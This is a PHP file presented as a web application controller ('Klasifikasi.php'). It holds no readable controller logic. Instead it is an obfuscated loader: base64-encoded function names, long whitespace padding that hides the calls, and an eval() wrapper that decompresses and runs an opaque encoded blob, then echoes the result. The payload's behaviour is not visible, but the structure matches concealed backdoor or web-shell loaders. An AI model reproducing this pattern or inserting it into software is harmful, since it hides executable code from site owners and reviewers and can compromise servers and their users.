<?php 
        $__='printf';$_='Loading donjo-app/controllers/Klasifikasi.php';
        























































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






















































































































































































































































                                                                                                                                                                                                                     $________;
